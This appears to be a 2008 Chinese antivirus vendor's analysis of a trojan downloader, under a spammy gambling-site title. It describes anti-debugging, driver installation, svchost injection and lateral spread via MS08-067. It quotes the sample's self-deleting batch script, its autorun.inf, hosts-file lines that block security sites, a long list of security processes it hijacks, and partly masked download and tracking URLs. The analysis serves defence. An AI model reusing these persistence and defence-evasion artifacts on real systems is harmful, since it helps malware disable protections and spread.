beplay体育app下载/欧国联含金量高吗/辽宁篮球直播/福彩快乐8走势图一定牛

   
首 頁(yè)  |  微點(diǎn)新聞  |  業(yè)界動(dòng)態(tài)  |  安全資訊  |  安全快報(bào)  |  產(chǎn)品信息  |  網(wǎng)絡(luò)版首頁(yè)
通行證  |  客服中心  |  微點(diǎn)社區(qū)  |  微點(diǎn)郵局  |  常見(jiàn)問(wèn)題  |  在線訂購(gòu)  |  各地代理商
 

木馬下載器Trojan-Downloader.Win32.Agent.akzn
來(lái)源:  2008-12-12 16:31:25



捕獲時(shí)間

2008-12-12

病毒摘要

該樣本是使用“C語(yǔ)言”編寫(xiě)的木馬下載器,由微點(diǎn)主動(dòng)防御軟件自動(dòng)捕獲,采用“RLPack”加殼方式試圖躲避特征碼掃描,長(zhǎng)度為“30,277 字節(jié)”,圖標(biāo)為“”,病毒擴(kuò)展名為“exe”,主要通過(guò)“網(wǎng)頁(yè)木馬”、“局域網(wǎng)感染”、“漏洞利用”、“文件捆綁”等方式傳播,病毒最終目的是下載大量各類木馬至本地運(yùn)行,實(shí)現(xiàn)各類網(wǎng)游盜號(hào)、設(shè)立后門(mén)等操作,使用戶利益受到損害。



感染對(duì)象


Windows 2000/Windows XP/Windows 2003

傳播途徑

網(wǎng)頁(yè)木馬、局域網(wǎng)感染、漏洞利用、文件捆綁

防范措施

已安裝使用微點(diǎn)主動(dòng)防御軟件的用戶,無(wú)須任何設(shè)置,微點(diǎn)主動(dòng)防御將自動(dòng)保護(hù)您的系統(tǒng)免受該病毒的入侵和破壞。無(wú)論您是否已經(jīng)升級(jí)到最新版本,微點(diǎn)主動(dòng)防御都能夠有效清除該病毒。如果您沒(méi)有將微點(diǎn)主動(dòng)防御軟件升級(jí)到最新版,微點(diǎn)主動(dòng)防御軟件在發(fā)現(xiàn)該病毒后將報(bào)警提示您發(fā)現(xiàn)“未知間諜軟件”,請(qǐng)直接選擇刪除處理(如圖1);


          圖1 微點(diǎn)主動(dòng)防御軟件自動(dòng)捕獲未知病毒(未升級(jí))


如果您已經(jīng)將微點(diǎn)主動(dòng)防御軟件升級(jí)到最新版本,微點(diǎn)將報(bào)警提示您發(fā)現(xiàn)"Trojan-Downloader.Win32.Agent.akzn”,請(qǐng)直接選擇刪除(如圖2)。


          圖2   微點(diǎn)主動(dòng)防御軟件升級(jí)后截獲已知病毒



對(duì)于未使用微點(diǎn)主動(dòng)防御軟件的用戶,微點(diǎn)反病毒專家建議
1、不要在不明站點(diǎn)下載非官方版本的軟件進(jìn)行安裝,避免病毒通過(guò)捆綁的方式進(jìn)入您的系統(tǒng)。
2、盡快將您的殺毒軟件特征庫(kù)升級(jí)到最新版本進(jìn)行查殺,并開(kāi)啟防火墻攔截網(wǎng)絡(luò)異常訪問(wèn),如依然有異常情況請(qǐng)注意及時(shí)與專業(yè)的安全軟件廠商聯(lián)系獲取技術(shù)支持。
3、開(kāi)啟windows自動(dòng)更新,及時(shí)打好漏洞補(bǔ)丁。

病毒分析

  該樣本程序被執(zhí)行后,首先將進(jìn)行防調(diào)試判斷,遍歷OllyICE.exe、OllyDbg.exe、ImportREC.exe、C32Asm.exe、LordPE.exe、PEditor.exe等調(diào)試軟件進(jìn)程,若遍歷獲得,則停止一切操作,進(jìn)程退出。
  成功執(zhí)行后,樣本將在系統(tǒng)文件夾“%Temp%”下釋放動(dòng)態(tài)庫(kù)文件“dll390.dll”,該動(dòng)態(tài)庫(kù)文件的命名特點(diǎn)是三位數(shù)字為隨機(jī),在“%SystemRoot%\system32”文件夾下釋放驅(qū)動(dòng)文件“Nskhelper2.sys”,將“Nskhelper2.sys”注冊(cè)為名為“NsRk1”的服務(wù),創(chuàng)建名為“\\.\NsRk1”的設(shè)備,相關(guān)注冊(cè)表項(xiàng)如下:

  
  項(xiàng):“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NsRk1”
  鍵:“Type”
  數(shù)據(jù):“SERVICE KERNEL DRIVER”
  鍵:“Start”
  數(shù)據(jù):“SERVICE DEMAND START”
  鍵:“ImagePath”
  數(shù)據(jù):“\??\C:\WINDOWS\system32\Nskhelper2.sys”
  鍵:“DisplayName”
  數(shù)據(jù):“NsRk1”


  啟動(dòng)“svchost.exe”,在其中劃出一塊內(nèi)存空間,將“dll390.dll”注入其中,啟動(dòng)十余個(gè)線程共同操作。修改注冊(cè)表,將下列安全及輔助工具進(jìn)程映像劫持,指向“svchost.exe”。

  360safe.exe
  360safebox.exe
  360tray.exe
  ACKWIN32.exe
  ANTI-TROJAN.exe
  anti.exe
  antivir.exe
  APVXDWIN.exe
  atrack.exe
  AUTODOWN.exe
  AVCONSOL.exe
  AVE32.exe
  AVGCTRL.exe
  avk.exe
  AVKSERV.exe
  avp.exe
  AVPUPD.exe
  AVSCHED32.exe
  avsynmgr.exe
  AVWIN95.exe
  avxonsol.exe
  BLACKD.exe
  BLACKICE.exe
  CCenter.exe
  CFIADMIN.exe
  CFIAUDIT.exe
  CFIND.exe
  cfinet.exe
  cfinet32.exe
  CLAW95.exe
  CLAW95CT.exe
  CLEANER.exe
  CLEANER3.exe
  DAVPFW.exe
  dbg.exe
  debu.exe
  DV95.exe
  DV95_O.exe
  DVP95.exe
  ECENGINE.exe
  EFINET32.exe
  ESAFE.exe
  ESPWATCH.exe
  explorewclass.exe
  F-AGNT95.exe
  F-PROT.exe
  f-prot95.exe
  f-stopw.exe
  FINDVIRU.exe
  fir.exe
  fp-win.exe
  FRW.exe
  IAMAPP.exe
  IAMSERV.exe
  IBMASN.exe
  IBMAVSP.exe
  ice.exe
  IceSword.exe
  ICLOAD95.exe
  ICLOADNT.exe
  ICMOON.exe
  ICSSUPPNT.exe
  iom.exe
  iomon98.exe
  JED.exe
  Kabackreport.exe
  Kasmain.exe
  kav32.exe
  kavstart.exe
  kissvc.exe
  KPFW32.exe
  kpfwsvc.exe
  KPPMain.exe
  KRF.exe
  KVMonXP.exe
  KVPreScan.exe
  kwatch.exe
  lamapp.exe
  lockdown2000.exe
  LOOKOUT.exe
  luall.exe
  LUCOMSERVER.exe
  mcafee.exe
  microsoft.exe
  mon.exe
  moniker.exe
  MOOLIVE.exe
  MPFTRAY.exe
  ms.exe
  N32ACAN.exe
  navapsvc.exe
  navapw32.exe
  NAVLU32.exe
  NAVNT.exe
  navrunr.exe
  NAVSCHED.exe
  NAVW.exe
  NAVW32.exe
  navwnt.exe
  nisserv.exe
  nisum.exe
  NMAIN.exe
  NORMIST.exe
  norton.exe
  NUPGRADE.exe
  NVC95.exe
  office.exe
  OUTPOST.exe
  PADMIN.exe
  PAVCL.exe
  pcc.exe
  PCCClient.exe
  pccguide.exe
  pcciomon.exe
  pccmain.exe
  pccwin98.exe
  PCFWALLICON.exe
  PERSFW.exe
  pop3trap.exe
  PpPpWallRun.exe
  program.exe
  prot.exe
  pview95.exe
  ras.exe
  Rav.exe
  RAV7.exe
  rav7win.exe
  RavMon.exe
  RavMonD.exe
  RavStub.exe
  RavTask.exe
  regedit.exe
  rescue32.exe
  Rfw.exe
  rn.exe
  safeboxTray.exe
  safeweb.exe
  scam32.exe
  scan.exe
  SCAN32.exe
  SCANPM.exe
  scon.exe
  SCRSCAN.exe
  secu.exe
  SERV95.exe
  sirc32.exe
  SMC.exe
  smtpsvc.exe
  SPHINX.exe
  spy.exe
  SWEEP95.exe
  symproxysvc.exe
  TBSCAN.exe
  TCA.exe
  TDS2-98.exe
  TDS2-NT.exe
  Tmntsrv.exe
  TMOAgent.exe
  tmproxy.exe
  tmupdito.exe
  TSC.exe
  UlibCfg.exe
  vavrunr.exe
  VET95.exe
  VETTRAY.exe
  vir.exe
  VPC32.exe
  VSECOMR.exe
  vshwin32.exe
  VSSCAN40
  vsstat.exe
  WEBSCAN.exe
  WEBSCANX.exe
  webtrap.exe
  WFINDV32.exe
  windows優(yōu)化大師.exe
  wink.exe
  zonealarm.exe

        生成隨機(jī)名批處理文件“45869415.bat”,實(shí)現(xiàn)自刪除,批處理如下:

  
  :Repeat
  del /f "C:\Sample.exe"
  if exist " C:\Sample.exe " goto Repeat
  del /f "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\45869415.bat"


  驅(qū)動(dòng)文件“Nskhelper2.sys”加載后,將恢復(fù)系統(tǒng)SSDT表,使部分安全軟件主動(dòng)防御功能失效,并關(guān)閉指定殺毒軟件進(jìn)程。
  被注入后的“svchost.exe”將在各本地磁盤(pán)根目錄生成“autorun.inf”配置文件與“dll390.dll”相同的數(shù)據(jù)文件“system.dll”,使用戶打開(kāi)磁盤(pán)后通過(guò)rundll32.exe加載“system.dll”;“autorun.inf”內(nèi)容如下:

  
  [autorun]
shell\open\command=rundll32 system.dll,explore
shell\explore\command=rundll32 system.dll,explore


  修改“%SystemRoot%\system32\drivers\etc”文件夾下的“hosts”文件,將以下安全廠商站點(diǎn)指向“127.0.0.1”,HOST文件如下:

127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 www.chinakv.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
127.0.0.1 www.jiangmin.com
127.0.0.1 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 union.kingsoft.com
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.1 360.qihoo.com

  訪問(wèn)網(wǎng)絡(luò),下載“http://biao.dj**4455.cn/number/list.txt”,存儲(chǔ)至“%Temp%”文件夾,重命名為隨機(jī)文件名,讀取文件列表,下載后運(yùn)行。
  連接網(wǎng)絡(luò),訪問(wèn)網(wǎng)絡(luò)“http://www.xxx.com/count.asp”,按照格式“mac=*&os=*&ver=*&temp=*&key=*”,上傳本機(jī)網(wǎng)卡MAC地址,操作系統(tǒng)及其版本等信息進(jìn)行感染統(tǒng)計(jì)。
  在系統(tǒng)目錄“%SystemRoot%\system32”生成“appwinproc.dll”, “appwinproc.dll”加載后,將進(jìn)行輔助關(guān)閉安全軟件進(jìn)程的工作。
  根據(jù)機(jī)器狗讀寫(xiě)物理磁盤(pán)原理,在“%SystemRoot%\system32\”文件夾下生成五個(gè)驅(qū)動(dòng)文件“NsPass0.sys”、“ NsPass1.sys”、“ NsPass2.sys”、“ NsPass3.sys”、“ NsPass4.sys”。分別針對(duì)“%SystemRoot%\system32\”文件夾下的“schedsvc.dll”、 “appmgmts.dll”、 “srsvc.dll”、 “w32time.dll”、 “wiaservc.dll”五個(gè)文件進(jìn)行改寫(xiě),寫(xiě)入“dll390.dll”的代碼,使以上文件相對(duì)應(yīng)的系統(tǒng)服務(wù) “Task Scheduler”、 “Application Management”、“System Restore Service”、 “Windows Time” 、“Windows Image Acquisition ”啟動(dòng)時(shí)先啟動(dòng)病毒,且同時(shí)保障了系統(tǒng)服務(wù)的正常加載。
  病毒還將嘗試掃描本機(jī)網(wǎng)段內(nèi)的其他機(jī)器,掃描成功后將在“%Temp%”文件夾內(nèi)生成一個(gè)隨機(jī)文件名的動(dòng)態(tài)庫(kù)文件,使用“rundll32.exe”將其加載,利用近期爆出的“MS-08067”漏洞,嘗試溢出局域網(wǎng)其他計(jì)算機(jī),進(jìn)行病毒傳播。

免費(fèi)體驗(yàn)
下  載
安裝演示